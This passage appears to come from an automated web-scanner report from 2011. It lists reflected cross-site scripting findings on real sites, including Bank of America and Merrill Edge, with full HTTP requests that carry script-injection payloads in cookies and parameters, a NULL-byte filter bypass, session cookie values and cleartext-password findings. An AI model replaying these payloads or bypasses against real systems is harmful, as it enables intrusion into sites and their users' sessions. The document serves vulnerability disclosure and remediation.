GET /jp/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en8184b"><script>alert(1)</script>1699682b65d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a5f"><script>alert(1)</script>be89fa02b90 was submitted in the mbfcookie[lang] cookie. This input was echoed as e4a5f\"><script>alert(1)</script>be89fa02b90 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /jp/infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ene4a5f"><script>alert(1)</script>be89fa02b90; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad6f9"><script>alert(1)</script>0bc779789b was submitted in the mbfcookie[lang] cookie. This input was echoed as ad6f9\"><script>alert(1)</script>0bc779789b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /kr/2.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enad6f9"><script>alert(1)</script>0bc779789b; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e2d6"><script>alert(1)</script>e91882c8043 was submitted in the mbfcookie[lang] cookie. This input was echoed as 4e2d6\"><script>alert(1)</script>e91882c8043 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /kr/network-infrastructure-security-report.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en4e2d6"><script>alert(1)</script>e91882c8043; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac374"><script>alert(1)</script>5a50e0c21ab was submitted in the mbfcookie[lang] cookie. This input was echoed as ac374\"><script>alert(1)</script>5a50e0c21ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /privacy_policy.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=enac374"><script>alert(1)</script>5a50e0c21ab; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9071"><script>alert(1)</script>e4e30e085f was submitted in the mbfcookie[lang] cookie. This input was echoed as a9071\"><script>alert(1)</script>e4e30e085f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=ena9071"><script>alert(1)</script>e4e30e085f; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54038"><script>alert(1)</script>1e95dab8e0e was submitted in the mbfcookie[lang] cookie. This input was echoed as 54038\"><script>alert(1)</script>1e95dab8e0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/lost-password-3.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en54038"><script>alert(1)</script>1e95dab8e0e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deb1d"><script>alert(1)</script>cfcda14f30a was submitted in the mbfcookie[lang] cookie. This input was echoed as deb1d\"><script>alert(1)</script>cfcda14f30a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /en/partner-portal-home.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=endeb1d"><script>alert(1)</script>cfcda14f30a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8239"><script>alert(1)</script>31f3540dcc0 was submitted in the mbfcookie[lang] cookie. This input was echoed as d8239\"><script>alert(1)</script>31f3540dcc0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=end8239"><script>alert(1)</script>31f3540dcc0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b457f"><script>alert(1)</script>667bdae159f was submitted in the mbfcookie[lang] cookie. This input was echoed as b457f\"><script>alert(1)</script>667bdae159f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?option=com_content&task=view&id=296&Itemid=297 HTTP/1.1 Host: www.arbornetworks.com Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; mbfcookie[lang]=enb457f"><script>alert(1)</script>667bdae159f; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.2.10.1296689848
The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bddb"><script>alert(1)</script>119487711af was submitted in the mbfcookie[lang] cookie. This input was echoed as 1bddb\"><script>alert(1)</script>119487711af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /register.html HTTP/1.1 Host: www.arbornetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mbfcookie[lang]=en1bddb"><script>alert(1)</script>119487711af; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0853'%3balert(1)//b444241d7da was submitted in the BOA_0020 cookie. This input was echoed as b0853';alert(1)//b444241d7da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/Control.do HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9b0853'%3balert(1)//b444241d7da; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:17 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=00004QCD_ZjewAQatQwb0kn5dXN:12qb4kb6q; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:16 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]... <!--
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fed0'%3balert(1)//f83f2273ab8 was submitted in the BOA_0020 cookie. This input was echoed as 3fed0';alert(1)//f83f2273ab8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de93fed0'%3balert(1)//f83f2273ab8; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:05:15 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000CnfCKRIifEAopeDjObSoiF3:12qb4k93q; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:05:14 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descri ...[SNIP]... <!--
The value of the BOA_0020 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0296'%3balert(1)//224de741dab was submitted in the BOA_0020 cookie. This input was echoed as a0296';alert(1)//224de741dab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /smallbusiness/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9a0296'%3balert(1)//224de741dab; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Response
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 02 Feb 2011 22:04:39 GMT Content-type: text/html;charset=ISO-8859-1 Content-language: en-US Set-cookie: JSESSIONID=0000iSQjObSnt8ukh_g0-dQwNmC:12qb4k2ev; Path=/ Set-cookie: INTL_LANG=en_US Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Wed, 09 Feb 2011 22:04:38 GMT; Domain=.bankofamerica.com Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-control: no-cache="set-cookie, set-cookie2" Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en_US"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Descript ...[SNIP]... <!--
3.180. https://www.merrilledge.com/m/pages/merrill-edge-advisory-center.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.merrilledge.com
Path:
/m/pages/merrill-edge-advisory-center.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f9e1d"><script>alert(1)</script>a47d51819dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9e1d"><script>alert(1)</script>a47d51819dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/merrill-edge-advisory-center.aspx?%00f9e1d"><script>alert(1)</script>a47d51819dc=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0095641'%3b9ef12e8200f was submitted in the src_cd parameter. This input was echoed as 95641';9ef12e8200f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/merrill-edge-advisory-center.aspx?src_cd=BAC1%0095641'%3b9ef12e8200f HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the pxs cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c13e'-alert(1)-'c4f9da1816c was submitted in the pxs cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /IRA/pages/home.aspx HTTP/1.1 Host: www.retirement.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: pxs=689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c; SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxv=4B1B9E90-7DD2-4095-A535-9FE88031C408; CMAVID=none; cmTPSet=Y; BrowserCheckDone=true;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 23:45:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 36286
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="Conten ...[SNIP]... <![CDATA[ lpAddVars('page','section','Home'); lpAddVars('page','ConversionStage','Home'); lpAddVars('page','Session ID','689c136b798e446897d1c2e0184bb0f55c13e'-alert(1)-'c4f9da1816c'); var cookieExists=false;Sys.Application.initialize(); Sys.Application.add_init(function() { $create(MerrillLynch.Application.ECMS.WebUI.ECMSContentCtrl, {"Application":"IRA","ContentLocations ...[SNIP]...
4. Cleartext submission of passwordpreviousnext There are 19 instances of this issue:
Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.
Issue remediation
The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.
GET /index.php?app=core&module=global§ion=login HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
GET /resources/documentation/index.html HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The page contains a form with the following action URL, which is submitted over clear-text HTTP:
http://fis.com/fis/worldnews/worldnews.asp
The form contains the following password field:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:54:33 GMT Connection: close Content-Length: 83533 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1 Host: insidejapantours.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/; CACHE-CONTROL: no-cache CONNECTION: Close DATE: Thu, 03 Feb 2011 01:02:54 GMT EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT PRAGMA: no-cache
